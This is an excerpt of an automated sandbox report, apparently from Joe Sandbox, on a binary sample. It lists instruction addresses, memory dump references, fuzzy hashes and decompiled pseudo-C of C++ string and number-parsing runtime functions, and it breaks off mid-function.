0x014001f3
0x014001f6
0x014007b4
0x014007b7
0x014007bf
0x014007c7
0x014001fc
0x014001fc
0x014001fc
0x013ffd3e
0x013ffd3e
0x013ffd3e
0x013ffd44
0x013ffd4f
0x013ffd56
0x013ffd59
0x013ffd60
0x013ffc93
0x013ffc99
0x013ffca5
0x013ffca5
0x013ffca8
0x013ffcab
0x013ffcb0
0x01400240
0x013ffcb6
0x013ffcb6
0x013ffcb6
0x013ffcbb
0x014000b0
0x014000bb
0x014000c3
0x014000cb
0x014000ce
0x014000d3
0x014000d6
0x014000d6
0x013ffcc5
0x013ffcc9
0x013ffccf
0x013ffcd2
0x013ffcd7
0x013ffcd7
0x013ffcdd
0x013ffded
0x013ffdf1
0x013ffce9
0x013ffce9
0x013ffcf4
0x013ffcf9
0x013ffd00
0x013ffd02
0x013ffd04
0x014001d8
0x014001db
0x014001de
0x01400797
0x0140079f
0x014007a2
0x014007a7
0x014001e4
0x014001e4
0x014001e4
0x013ffd0a
0x013ffd0a
0x013ffd0a
0x013ffd0c
0x013ffd13
0x013ffd1b
0x013ffd1d
0x013ffd20
0x00000000
0x00000000
0x013ffd20
0x013ffce3
0x013ffce3
0x013ffce6
0x00000000
0x013ffce6
0x013ffd66
0x013ffd6e
0x014000e0
0x014000e4
0x01400250
0x01400254
0x01400257
0x0140025a
0x0140025c
0x00000000
0x00000000
0x00000000
0x01400262
0x014000ed
0x014000ef
0x00000000
0x014000f1
0x014000f4
0x014000f8
0x014000ff
0x00000000
0x014000ff
0x014000ef
0x013ffd74
0x013ffd77
0x013ffd7b
0x013ffd80
0x00000000
0x00000000
0x013ffd8b
0x00000000
0x00000000
0x013ffd95
0x00000000
0x00000000
0x013ffd9b
0x013ffda0
0x0140090b
0x00000000
0x0140090b
0x013ffda6
0x013ffda9
0x013ffdaf
0x013ffdb2
0x013ffdb2
0x013ffdb7
0x01400270
0x013ffdbd
0x013ffdbd
0x013ffdbd
0x013ffdc2
0x01400208
0x01400213
0x0140021b
0x01400223
0x01400226
0x0140022b
0x0140022e
0x0140022e
0x013ffdcc
0x013ffdd3
0x013ffdd9
0x013ffddc
0x013ffde1
0x013ffde7
0x00000000
0x00000000
0x00000000
0x00000000
0x01400110
0x01400110
0x01400113
0x01400118
0x0140011b
0x00000000
0x00000000
0x0140012a
0x01400134
0x0140013c
0x01400140
0x01400143
0x01400145
0x00000000
0x00000000
0x00000000
0x00000000
0x01400145
0x00000000
0x013ffc83
0x014006c6
0x014006c6
0x00000000
0x013fff92
0x013fff92
0x013fff92
0x013fff9c
0x013fff9c
0x013fffa6
0x00000000

Strings

-, xrefs: 0140058E

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 2fea49b4211476d09f7f1c0412452243d32118b0c667fd2fcfdf926bb9c33650
Instruction ID: 96fc2b28876db009ceea4f91da142a7aa7d93815c102929cdf7c539bac826165
Opcode Fuzzy Hash: 2fea49b4211476d09f7f1c0412452243d32118b0c667fd2fcfdf926bb9c33650
Instruction Fuzzy Hash: 35A28E71A043598FDF12CF69C5847ADBBB2AF45364F188669E859AB3E2C730DC45CB80

Uniqueness

Uniqueness Score: -1.00%

Function 01438BF0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E01438BF0(void* __ebx, void* __edi, void* __esi, void* __ebp, signed char* _a4, intOrPtr _a8, char* _a12) {
				char* _v36;
				signed char* _v40;
				char** _t14;
				intOrPtr _t21;
				char* _t22;
				void* _t24;
				void* _t25;
				signed char* _t27;
				char** _t30;
				char* _t33;
				void* _t35;
				char** _t36;

				_t32 = __ebp;
				_push(__ebp);
				_push(__edi);
				_push(__ebx);
				_t36 = _t35 - 0x1c;
				_t21 = _a8;
				_t27 = _a4;
				if(_t21 == 0 || _t27 != 0) {
					_t22 = _t21 - _t27;
					_v40 = 0;
					 *_t36 = _t22;
					_v36 = _a12;
					_t14 = E01439190(_t22, _t24, _t27, _t32);
					_t30 = _t14;
					_t6 =  &(_t14[3]); // 0xc
					_t33 = _t6;
					if(_t22 == 1) {
						_t30[3] =  *_t27 & 0x000000ff;
					} else {
						if(_t22 != 0) {
							_v36 = _t22;
							_v40 = _t27;
							 *_t36 = _t33;
							memcpy(??, ??, ??);
						}
					}
					_t30[2] = 0;
					 *_t30 = _t22;
					 *((char*)(_t30 +  &(_t22[0xc]))) = 0;
					return _t33;
				} else {
					 *_t36 = "basic_string::_S_construct null not valid";
					E014796C0(_t25, _t27);
					return 0x14a4650;
				}
			}

0x01438bf0
0x01438bf0
0x01438bf1
0x01438bf3
0x01438bf4
0x01438bf7
0x01438bfb
0x01438c01
0x01438c0b
0x01438c0d
0x01438c15
0x01438c18
0x01438c1c
0x01438c21
0x01438c23
0x01438c23
0x01438c29
0x01438c6b
0x01438c2b
0x01438c2d
0x01438c50
0x01438c54
0x01438c58
0x01438c5b
0x01438c5b
0x01438c2d
0x01438c2f
0x01438c38
0x01438c3a
0x01438c46
0x01438c70
0x01438c70
0x01438c77
0x01438c85
0x01438c85

Strings

basic_string::_S_construct null not valid, xrefs: 01438C70

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID:
String ID: basic_string::_S_construct null not valid
API String ID: 0-290684606
Opcode ID: 3fcca4f40dae38d2f22d16963b21c88fc3e2021e9601de62679cc63c603b08bf
Instruction ID: 6d4fadbad4f61746b541753bd946bd9ddedc227a1cc08e1d37c0baebcc9de933
Opcode Fuzzy Hash: 3fcca4f40dae38d2f22d16963b21c88fc3e2021e9601de62679cc63c603b08bf
Instruction Fuzzy Hash: 9B0148B150A3429BD7106F6AC08462BFFE4EFA9254F998A2EF4D887321C375D444CB52

Uniqueness

Uniqueness Score: -1.00%

Function 013EA580 Relevance: 2.5, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E013EA580(void* __ebx, intOrPtr* __ecx, char* __edi, void* __esi, intOrPtr* _a4, intOrPtr* _a8, intOrPtr _a12) {
				char _v13;
				char _v32;
				char* _v36;
				char* _v40;
				char _t13;
				void* _t16;
				intOrPtr* _t26;
				intOrPtr _t27;
				intOrPtr _t33;
				void* _t35;
				void* _t36;
				char** _t37;

				_push(__edi);
				_push(__esi);
				_push(__ebx);
				_t37 = _t36 - 0x20;
				_t26 = _a8;
				_t33 = _a12;
				_t27 =  *_a4;
				_t13 =  *((intOrPtr*)(_t27 - 0xc));
				if(_t13 < _t26) {
					_v32 = _t13;
					_v36 = _t26;
					_v40 = "basic_string::substr";
					 *_t37 = "%s: __pos (which is %zu) > this->size() (which is %zu)";
					E01473530(__edi, __eflags);
					return  *_t26;
				} else {
					_t16 = _t13 - _t26;
					_v32 = 0;
					_v36 =  &_v13;
					_t17 =  >  ? _t33 : _t16;
					_t18 = ( >  ? _t33 : _t16) + _t26;
					_t19 = ( >  ? _t33 : _t16) + _t26 + _t27;
					_v40 = ( >  ? _t33 : _t16) + _t26 + _t27;
					 *_t37 = _t27 + _t26;
					 *__ecx = E01438BF0(__ecx,  &_v13, _t33, _t35);
					return __ecx;
				}
			}

0x013ea580
0x013ea581
0x013ea582
0x013ea585
0x013ea58c
0x013ea590
0x013ea594
0x013ea596
0x013ea59b
0x013ea5d0
0x013ea5d4
0x013ea5d8
0x013ea5e0
0x013ea5e7
0x013ea5f2
0x013ea59d
0x013ea59d
0x013ea5a3
0x013ea5aa
0x013ea5ae
0x013ea5b1
0x013ea5b3
0x013ea5b7
0x013ea5bb
0x013ea5c3
0x013ea5cd
0x013ea5cd

Strings

basic_string::substr, xrefs: 013EA5D8
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 013EA5E0

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
API String ID: 0-3532027576
Opcode ID: c451105785770bf0611dafe6729cc59983fc401597674b9949ec7cfc33c5f72d
Instruction ID: 2ae1f5cc4cf145bdddfbccb4fa37c6e1b658c9d45e56b229b443a8e282570767
Opcode Fuzzy Hash: c451105785770bf0611dafe6729cc59983fc401597674b9949ec7cfc33c5f72d
Instruction Fuzzy Hash: 8D0124B1A0A3029FC7089F29D880A5AFBE0ABD9350F44992EF488C7310D234D8418B86

Uniqueness

Uniqueness Score: -1.00%

Function 0140BA90 Relevance: 2.1, APIs: 1, Instructions: 873COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91522ba717e454799b9e890d32ecb3ee8a887269d1687562e0e7d53f684f3a1c
Instruction ID: 1c9519e3efd0a33e77cdb38b0bea95c7d94f253beaaa0bc97121d3bbb9518fd8
Opcode Fuzzy Hash: 91522ba717e454799b9e890d32ecb3ee8a887269d1687562e0e7d53f684f3a1c
Instruction Fuzzy Hash: D3826E74E04298CFDB12CFA9C49479DBFF1AF45320F1886AAD855AB3E6C7359846CB40

Uniqueness

Uniqueness Score: -1.00%

Function 01409440 Relevance: 2.0, APIs: 1, Instructions: 790
COMMONCrypto

Download Yara Rule

C-Code - Quality: 20%

			E01409440(void* __eflags, signed int _a4, signed int _a8, signed char _a12, signed int _a16, signed int _a20, signed int* _a24, signed int* _a28) {
				void* _v16;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v101;
				char _v102;
				signed int _v108;
				signed char _v112;
				signed char _v136;
				signed int _v140;
				signed int _v144;
				signed int _t417;
				signed int _t418;
				signed int _t421;
				intOrPtr* _t422;
				signed int _t430;
				signed char _t432;
				intOrPtr* _t437;
				signed int _t447;
				signed int _t449;
				char _t453;
				signed int _t461;
				signed int _t468;
				void* _t469;
				void* _t470;
				signed int _t472;
				signed int _t473;
				void* _t475;
				signed char _t476;
				char _t484;
				signed char* _t490;
				signed int _t492;
				void* _t499;
				signed int _t500;
				signed int _t501;
				void* _t503;
				signed char _t505;
				signed char* _t511;
				signed int _t513;
				signed char _t518;
				signed int _t519;
				signed char _t524;
				signed int _t526;
				signed char _t530;
				signed char* _t537;
				signed int _t539;
				void* _t542;
				signed int _t543;
				signed int _t545;
				signed int _t547;
				signed int _t550;
				void* _t552;
				signed char _t554;
				signed char* _t560;
				signed int _t562;
				signed char* _t563;
				void* _t565;
				signed int _t570;
				signed char _t572;
				signed int _t573;
				signed int _t574;
				signed int _t575;
				signed int _t577;
				signed int _t579;
				signed int _t580;
				signed char _t582;
				signed int _t583;
				signed char _t585;
				signed int _t598;
				signed int _t603;
				signed int _t605;
				signed int _t609;
				signed int _t616;
				signed char _t623;
				signed char _t632;
				signed int _t634;
				signed int _t637;
				signed int _t643;
				signed int _t644;
				signed int _t645;
				signed int _t648;
				signed int _t649;
				signed int _t653;
				signed char _t657;
				signed int _t659;
				signed char _t661;
				void* _t666;
				signed int _t667;
				signed int _t671;
				signed int _t675;
				void* _t678;
				signed int* _t679;
				void* _t731;

				_t679 = _t678 - 0x7c;
				_t585 = _a12;
				_t417 = _a8;
				_t675 = _a4;
				_v92 = _t585;
				_t570 = _a20;
				_v76 = _t585;
				_v96 = _a16;
				_v64 = _t675;
				_v80 = _t417;
				_v68 = _t417;
				_t418 = E013F0230(0x14a4808);
				_v72 = _t418;
				_t421 =  *((intOrPtr*)( *((intOrPtr*)(_t570 + 0x6c)) + 0xc)) + _t418 * 4;
				_t666 =  *_t421;
				_v84 = _t421;
				if(_t666 == 0) {
					_t422 = E01477960(0x68);
					 *(_t422 + 4) = 0;
					_t667 = _t422;
					 *_t422 = 0x14b1c70;
					 *(_t422 + 8) = 0;
					 *(_t422 + 0xc) = 0;
					 *((char*)(_t422 + 0x10)) = 0;
					 *(_t422 + 0x14) = 0;
					 *(_t422 + 0x18) = 0;
					 *(_t422 + 0x1c) = 0;
					 *(_t422 + 0x20) = 0;
					 *((char*)(_t667 + 0x64)) = 0;
					 *((short*)(_t667 + 0x24)) =  *0x14a8a04 & 0x0000ffff;
					_v140 = _t570 + 0x6c;
					E014590A0(_t667, __eflags);
					_v144 = _t667;
					_v140 = _v72;
					E0145F340( *((intOrPtr*)(_t570 + 0x6c)));
					_t679 = _t679 - 0xfffffffffffffffc;
					_t666 =  *_v84;
				}
				_v84 = 8;
				_t430 =  *(_t570 + 0xc) & 0x0000004a;
				_v88 = _t430;
				if(_t430 != 0x40) {
					_t569 =  ==  ? 0x10 : 0xa;
					_v84 =  ==  ? 0x10 : 0xa;
				}
				_v72 = _v80 == 0xffffffff;
				_t572 = (_t570 & 0xffffff00 | _v64 != 0x00000000) & _v72 & 0x000000ff;
				if(_t572 != 0) {
					_t432 = _v64;
					__eflags =  *((intOrPtr*)(_t432 + 8)) -  *((intOrPtr*)(_t432 + 0xc));
					if( *((intOrPtr*)(_t432 + 8)) >=  *((intOrPtr*)(_t432 + 0xc))) {
						__eflags =  *((intOrPtr*)( *_t432 + 0x24))() - 0xffffffff;
						_t675 =  !=  ? _v64 : 0;
						_t573 =  !=  ? 0 : _t572;
					} else {
						_t573 = 0;
					}
				} else {
					_t573 = _v72 & 0x000000ff;
				}
				_v64 = _v96 == 0xffffffff;
				_t632 = (_v92 & 0xffffff00 | _v92 != 0x00000000) & _v64 & 0x000000ff;
				if(_t632 != 0) {
					_t437 = _v92;
					__eflags =  *((intOrPtr*)(_t437 + 8)) -  *((intOrPtr*)(_t437 + 0xc));
					if( *((intOrPtr*)(_t437 + 8)) >=  *((intOrPtr*)(_t437 + 0xc))) {
						_v96 = _t632;
						__eflags =  *((intOrPtr*)( *_t437 + 0x24))() - 0xffffffff;
						_t441 =  !=  ? _v92 : 0;
						_v76 =  !=  ? _v92 : 0;
						_t634 =  !=  ? 0 : _v96 & 0x000000ff;
					} else {
						_t634 = 0;
					}
				} else {
					_t634 = _v64 & 0x000000ff;
				}
				if(_t634 == _t573) {
					_v102 = 0;
					_t574 = 0;
					_v88 = 1;
					_v80 = 0;
					_v72 = 0;
					goto L43;
				} else {
					if(_t675 != 0 && _v72 != 0) {
						_t563 =  *(_t675 + 8);
						__eflags = _t563 -  *(_t675 + 0xc);
						if(_t563 >=  *(_t675 + 0xc)) {
							_t565 =  *((intOrPtr*)( *_t675 + 0x24))();
							__eflags = _t565 - 0xffffffff;
							_t574 =  ==  ? 0xffffffff : _t565;
							_t675 =  ==  ? 0 : _t675;
						} else {
							_t574 =  *_t563 & 0x000000ff;
						}
					} else {
						_t574 = _v80 & 0x000000ff;
					}
					_t519 =  *(_t666 + 0x10) & 0x000000ff;
					_t41 =  &_v102;
					 *_t41 =  *((intOrPtr*)(_t666 + 0x4a)) == _t574;
					if( *_t41 == 0 ||  *((intOrPtr*)(_t666 + 0x4b)) == _t574) {
						if(_t519 != 0) {
							__eflags =  *((intOrPtr*)(_t666 + 0x25)) - _t574;
							if( *((intOrPtr*)(_t666 + 0x25)) != _t574) {
								goto L14;
							}
							goto L26;
						}
						L14:
						if( *((intOrPtr*)(_t666 + 0x24)) == _t574) {
							goto L26;
						}
						_t547 =  *(_t675 + 8);
						_t659 =  *(_t675 + 0xc);
						if(_t547 >= _t659) {
							 *((intOrPtr*)( *_t675 + 0x28))();
							_t550 =  *(_t675 + 8);
							_t659 =  *(_t675 + 0xc);
						} else {
							_t550 = _t547 + 1;
							 *(_t675 + 8) = _t550;
						}
						if(_t550 >= _t659) {
							_t552 =  *((intOrPtr*)( *_t675 + 0x24))();
							__eflags = _t552 - 0xffffffff;
							if(_t552 != 0xffffffff) {
								goto L18;
							}
							_v68 = 1;
							_t675 = 0;
							goto L19;
						} else {
							L18:
							_v68 = 0;
							L19:
							_t661 = (_t659 & 0xffffff00 | _v76 != 0x00000000) & _v64;
							if(_t661 != 0) {
								_t554 = _v76;
								__eflags =  *((intOrPtr*)(_t554 + 8)) -  *((intOrPtr*)(_t554 + 0xc));
								if( *((intOrPtr*)(_t554 + 8)) >=  *((intOrPtr*)(_t554 + 0xc))) {
									_v72 = _t661;
									__eflags =  *((intOrPtr*)( *_t554 + 0x24))() - 0xffffffff;
									_t558 =  !=  ? _v76 : 0;
									_v76 =  !=  ? _v76 : 0;
									_t634 =  !=  ? 0 : _v72 & 0x000000ff;
								} else {
									_t634 = 0;
								}
							} else {
								_t634 = _v64 & 0x000000ff;
							}
							if(_v68 == _t634) {
								_v68 = 0xffffffff;
								_v88 = 1;
								_v80 = 0;
								_v72 = 0;
								goto L43;
							} else {
								if(_t675 == 0) {
									L180:
									_t574 = 0xffffffff;
									_t675 = 0;
									L25:
									_v68 = 0xffffffff;
									_t519 =  *(_t666 + 0x10) & 0x000000ff;
									goto L26;
								}
								_t560 =  *(_t675 + 8);
								if(_t560 >=  *(_t675 + 0xc)) {
									_t562 =  *((intOrPtr*)( *_t675 + 0x24))();
									_t574 = _t562;
									__eflags = _t562 - 0xffffffff;
									if(_t562 != 0xffffffff) {
										goto L25;
									}
									goto L180;
								} else {
									_t574 =  *_t560 & 0x000000ff;
									goto L25;
								}
							}
						}
					} else {
						_v102 = 0;
						L26:
						_t634 = _v84;
						_t616 = _v68;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t634;
						while(_t519 == 0 ||  *((intOrPtr*)(_t666 + 0x25)) != _t574) {
							if( *((intOrPtr*)(_t666 + 0x24)) == _t574) {
								break;
							}
							if( *(_t666 + 0x4e) == _t574) {
								__eflags = _v68 - 0xa;
								_t634 = _v72 & 0x000000ff ^ 0x00000001 | _t519 & 0xffffff00 | _v68 == 0x0000000a;
								__eflags = _t634;
								if(_t634 == 0) {
									L32:
									if( *((intOrPtr*)(_t666 + 0x4c)) == _t574 ||  *((intOrPtr*)(_t666 + 0x4d)) == _t574) {
										_t524 = _v88 & 0xffffff00 | _v88 == 0x00000000 | _t634;
										if(_t524 == 0) {
											_v88 = _t524;
											_v72 = 1;
											_v84 = _v68;
											_v68 = _t616;
											goto L44;
										}
										_v80 = 0;
										_v72 = 0;
										_v68 = 0x10;
										L36:
										_t526 =  *(_t675 + 8);
										_t653 =  *(_t675 + 0xc);
										if(_t526 >= _t653) {
											L77:
											 *((intOrPtr*)( *_t675 + 0x28))();
											__eflags =  *(_t675 + 8) -  *(_t675 + 0xc);
											if( *(_t675 + 8) <  *(_t675 + 0xc)) {
												L38:
												_v84 = 0;
												L39:
												_t657 = (_v76 & 0xffffff00 | _v76 != 0x00000000) & _v64;
												if(_t657 != 0) {
													_t530 = _v76;
													__eflags =  *((intOrPtr*)(_t530 + 8)) -  *((intOrPtr*)(_t530 + 0xc));
													if( *((intOrPtr*)(_t530 + 8)) >=  *((intOrPtr*)(_t530 + 0xc))) {
														_v92 = _t657;
														__eflags =  *((intOrPtr*)( *_t530 + 0x24))() - 0xffffffff;
														_t534 =  !=  ? _v76 : 0;
														_v76 =  !=  ? _v76 : 0;
														_t634 =  !=  ? 0 : _v92 & 0x000000ff;
													} else {
														_t634 = 0;
													}
												} else {
													_t634 = _v64 & 0x000000ff;
												}
												if(_v84 != _t634) {
													__eflags = _t675;
													if(_t675 == 0) {
														L109:
														_t574 = 0xffffffff;
														_t675 = 0;
														L84:
														__eflags = _v72;
														if(_v72 == 0) {
															_v88 = 0;
															_v68 = 0xffffffff;
															_v84 = _v68;
															goto L43;
														}
														_t519 =  *(_t666 + 0x10) & 0x000000ff;
														_t616 = 0xffffffff;
														continue;
													}
													_t537 =  *(_t675 + 8);
													__eflags = _t537 -  *(_t675 + 0xc);
													if(_t537 >=  *(_t675 + 0xc)) {
														_t539 =  *((intOrPtr*)( *_t675 + 0x24))();
														_t574 = _t539;
														__eflags = _t539 - 0xffffffff;
														if(_t539 != 0xffffffff) {
															goto L84;
														}
														goto L109;
													}
													_t574 =  *_t537 & 0x000000ff;
													goto L84;
												} else {
													_v88 = 1;
													_v68 = 0xffffffff;
													_v84 = _v68;
													goto L43;
												}
											}
											L79:
											_t542 =  *((intOrPtr*)( *_t675 + 0x24))();
											__eflags = _t542 - 0xffffffff;
											if(_t542 != 0xffffffff) {
												goto L38;
											}
											_v84 = 1;
											_t675 = 0;
											goto L39;
										}
										L37:
										_t543 = _t526 + 1;
										 *(_t675 + 8) = _t543;
										if(_t543 >= _t653) {
											goto L79;
										}
										goto L38;
									} else {
										_v88 = 0;
										_v68 = _t616;
										_v84 = _v68;
										_v72 = 1;
										L43:
										if(_v84 == 0x10) {
											L137:
											_v112 = 0x16;
											_v108 = 0x16;
											L45:
											_v48 = 0;
											_v52 =  &_v44;
											_v44 = 0;
											if( *(_t666 + 0x10) != 0) {
												 *_t679 = 0x20;
												E01464B20( &_v52, _t634);
												_t679 = _t679 - 4;
											}
											_v100 = 0xffffffff / _v84;
											_t447 =  *(_t666 + 0x64) & 0x000000ff;
											_v101 = _t447;
											if(_t447 != 0) {
												__eflags = _v88;
												if(_v88 != 0) {
													_t575 = _v48;
													_v92 = 0;
													_v96 = 0;
													_v101 = _v88 & 0x000000ff;
													_t449 = _v52;
													_v88 = 0;
													goto L62;
												}
												_t229 = _t666 + 0x4e; // 0x4e
												_v96 = 0;
												_v108 = _t229;
												_v92 = 0;
												while(1) {
													_t643 =  *(_t666 + 0x10) & 0x000000ff;
													__eflags = _t643;
													if(_t643 == 0) {
														goto L119;
													}
													__eflags =  *((intOrPtr*)(_t666 + 0x25)) - _t574;
													if( *((intOrPtr*)(_t666 + 0x25)) == _t574) {
														_t603 = _v52;
														__eflags = _v80;
														_t575 = _v48;
														_t449 = _t603;
														if(_v80 == 0) {
															_v101 = 0;
															_v88 = _t643;
															goto L62;
														}
														_t283 = _t575 + 1; // 0x1
														_v68 = _t283;
														__eflags = _t603 -  &_v44;
														if(_t603 ==  &_v44) {
															_t484 = 0xf;
														} else {
															_t484 = _v44;
														}
														__eflags = _t484 - _v68;
														if(_t484 < _v68) {
															_v136 = 1;
															_v140 = 0;
															_v144 = 0;
															 *_t679 = _t575;
															E01464F90( &_v52);
															_t603 = _v52;
															_t679 = _t679 - 0x10;
														}
														_v80 = 0;
														 *((char*)(_t603 + _t575)) = _v80 & 0x000000ff;
														_t605 = _v68;
														_v48 = _t605;
														 *((char*)(_v52 + _t605)) = 0;
														L123:
														_t472 =  *(_t675 + 8);
														_t645 =  *(_t675 + 0xc);
														__eflags = _t472 - _t645;
														if(_t472 >= _t645) {
															L132:
															 *((intOrPtr*)( *_t675 + 0x28))();
															_t473 =  *(_t675 + 8);
															_t645 =  *(_t675 + 0xc);
															L125:
															__eflags = _t473 - _t645;
															if(_t473 >= _t645) {
																_t475 =  *((intOrPtr*)( *_t675 + 0x24))();
																__eflags = _t475 - 0xffffffff;
																if(_t475 != 0xffffffff) {
																	goto L126;
																}
																_t675 = 0;
																_v68 = _v101 & 0x000000ff;
																L127:
																__eflags = _v76;
																_t579 = (_t577 & 0xffffff00 | _v76 != 0x00000000) & _v64;
																__eflags = _t579;
																if(_t579 != 0) {
																	_t476 = _v76;
																	__eflags =  *((intOrPtr*)(_t476 + 8)) -  *((intOrPtr*)(_t476 + 0xc));
																	if( *((intOrPtr*)(_t476 + 8)) >=  *((intOrPtr*)(_t476 + 0xc))) {
																		__eflags =  *((intOrPtr*)( *_t476 + 0x24))() - 0xffffffff;
																		_t580 =  !=  ? 0 : _t579;
																		_t481 =  !=  ? _v76 : 0;
																		_v76 =  !=  ? _v76 : 0;
																	} else {
																		_t580 = 0;
																	}
																} else {
																	_t580 = _v64 & 0x000000ff;
																}
																__eflags = _t580 - _v68;
																if(_t580 != _v68) {
																	__eflags = _t675;
																	if(_t675 == 0) {
																		L153:
																		_t574 = 0xffffffff;
																		_t675 = 0;
																		__eflags = 0;
																		L154:
																		_v68 = 0xffffffff;
																		continue;
																	}
																	_t490 =  *(_t675 + 8);
																	__eflags = _t490 -  *(_t675 + 0xc);
																	if(_t490 >=  *(_t675 + 0xc)) {
																		_t492 =  *((intOrPtr*)( *_t675 + 0x24))();
																		_t574 = _t492;
																		__eflags = _t492 - 0xffffffff;
																		if(_t492 != 0xffffffff) {
																			goto L154;
																		}
																		goto L153;
																	}
																	_t574 =  *_t490 & 0x000000ff;
																	goto L154;
																} else {
																	_t575 = _v48;
																	_t449 = _v52;
																	_v68 = 0xffffffff;
																	goto L62;
																}
															}
															L126:
															_v68 = 0;
															goto L127;
														}
														L124:
														_t473 = _t472 + 1;
														__eflags = _t473;
														 *(_t675 + 8) = _t473;
														goto L125;
													}
													L119:
													__eflags =  *((intOrPtr*)(_t666 + 0x24)) - _t574;
													if( *((intOrPtr*)(_t666 + 0x24)) == _t574) {
														goto L89;
													}
													_v144 = _t574;
													_v140 = _v112;
													_t577 = _v108;
													 *_t679 = _t577;
													_t468 = memchr(??, ??, ??);
													__eflags = _t468;
													if(_t468 == 0) {
														goto L89;
													}
													_t469 = _t468 - _t577;
													_t598 = _v92;
													_t241 = _t469 - 6; // -6
													_t644 = _t241;
													__eflags = _t469 - 0xf;
													_t470 =  >  ? _t644 : _t469;
													__eflags = _v100 - _t598;
													if(__eflags < 0) {
														_t645 =  *(_t675 + 0xc);
														_v96 = _v101 & 0x000000ff;
														_t472 =  *(_t675 + 8);
														__eflags = _t472 - _t645;
														if(_t472 < _t645) {
															goto L124;
														}
														goto L132;
													}
													_t577 = _v84;
													_v80 = _v80 + 1;
													_t248 =  &_v96;
													 *_t248 = _v96 | _t644 & 0xffffff00 | __eflags > 0x00000000;
													__eflags =  *_t248;
													_v92 = _t470 + _t598 * _t577;
													goto L123;
												}
											} else {
												_v96 = 0;
												if(_v88 != 0) {
													_t575 = _v48;
													_v88 = 0;
													_v92 = 0;
													_v101 = _v88 & 0x000000ff;
													_t449 = _v52;
													L62:
													_t637 = _t449;
													if(_t575 != 0) {
														L90:
														_v76 = _v80 & 0x000000ff;
														_t184 = _t575 + 1; // 0x1
														_v64 = _t184;
														__eflags = _t637 -  &_v44;
														if(_t637 ==  &_v44) {
															_t453 = 0xf;
														} else {
															_t453 = _v44;
														}
														__eflags = _t453 - _v64;
														if(_t453 < _v64) {
															_v136 = 1;
															_v140 = 0;
															_v144 = 0;
															 *_t679 = _t575;
